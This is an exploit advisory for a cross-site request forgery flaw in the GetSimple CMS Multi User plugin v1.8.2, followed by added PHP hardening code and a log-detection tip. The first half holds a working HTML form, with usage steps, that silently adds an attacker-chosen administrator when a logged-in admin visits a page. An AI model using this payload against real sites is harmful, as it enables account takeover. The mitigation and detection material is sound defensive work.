# Exploit Title: GetSimple CMS Plugin Multi User v1.8.2 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
# Date: August 2020-08-12
# Vendor Homepage: http://get-simple.info/extend/plugin/multi-user/133/
# Software Link: http://get-simple.info/extend/export/960/133/multi-user.zip
# Version: 1.8.2
# Tested On: Windows 10 Pro + XAMPP
# CWE-352: Cross-Site Request Forgery (CSRF)
# Vulnerability Description:
# Cross-Site Request Forgery (CSRF) vulnerability in Multi User v1.8.2 plugin for GetSimple CMS allows remote attackers to add an Admin user via authenticated admin visiting a third-party site.
#
## Usage:
+ Change <IP||DOMAIN> to target IP address or domain name
+ Change <ADMIN> to target username
+ Change <PASSWORD> to target password
## CSRF POST Form Method
<html>
  <body>
    <script>history.pushState('','','/')</script>
    <form action="http://<IP||DOMAIN>/admin/load.php?id=user-managment" method="POST">
      <input type="hidden" name="usernamec" value="<ADMIN>"/>
      <input type="hidden" name="useremail" value="ADMIN@DOMAIN.LOCAL"/>
      <input type="hidden" name="ntimezone" value=""/>
      <input type="hidden" name="userlng" value="en_US"/>
      <input type="hidden" name="userpassword" value="<PASSWORD>"/>
      <input type="hidden" name="usereditor" value="1"/>
      <input type="hidden" name="Landing" value=""/>
      <input type="hidden" name="add-user" value="Add New User"/>
      <input type="submit" value="Submit request"/>
    </form>
  </body>
</html>
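The form above works because the plugin's add-user handler accepts any POST that arrives with the victim's admin session cookie and the expected field names; nothing in the request proves it was submitted from the CMS's own page. The following is an added example of how the handler would be hardened (this is not the Multi User plugin's or GetSimple's own code, and the function names, the `csrf_token` field and session key, and the `SITE_ORIGIN` value are this example's own assumptions): a per-session synchronizer token embedded in the legitimate form and verified with `hash_equals`, an Origin/Referer check as defence in depth, and a `SameSite=Lax` session cookie so the cookie is not attached to a cross-site POST in the first place.

```php
<?php
// Added example (not the Multi User plugin's or GetSimple's own code):
// synchronizer-token CSRF protection for the add-user POST handler.
// Function names, the "csrf_token" field/session key and SITE_ORIGIN are
// this example's own assumptions.

declare(strict_types=1);

// Constructed placeholder for the origin the admin UI is served from.
const SITE_ORIGIN = 'http://cms.example.local';

// PHP 7.3+: a Lax SameSite session cookie is not sent with cross-site
// top-level POSTs, which on its own stops the forged form in modern browsers.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// Issue (or reuse) a random per-session token for embedding in the real form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field for the legitimate add-user form. A page on another origin
// cannot read this value (same-origin policy), so it cannot reproduce it.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '"/>';
}

// True only if the POST carries the session's token and, when the browser
// sent Origin (or, failing that, Referer), the header names our own site.
function csrf_request_is_valid(array $post, array $server): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($supplied)
        || !hash_equals($expected, $supplied)) {
        return false;
    }

    // Defence in depth: a forged form is submitted from the attacker's origin.
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== SITE_ORIGIN) {
        return false;
    }
    $referer = $server['HTTP_REFERER'] ?? null;
    if ($origin === null && $referer !== null
        && strpos($referer, SITE_ORIGIN . '/') !== 0) {
        return false;
    }
    return true;
}

// The add-user handler as the plugin would wrap it: refuse early, log, exit.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['add-user'])) {
    if (!csrf_request_is_valid($_POST, $_SERVER)) {
        http_response_code(403);
        error_log('CSRF check failed for add-user from '
            . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
        exit('Invalid request token.');
    }
    // ... the plugin's existing account-creation logic would run here ...
}
```

The token check is the actual fix; the Origin/Referer and SameSite layers only reduce exposure where a browser or proxy strips one of them. For detection while the plugin is unpatched, POSTs to `/admin/load.php?id=user-managment` whose Origin or Referer header is absent or names a foreign site are the signature of the form above and are worth alerting on in the web server's access logs.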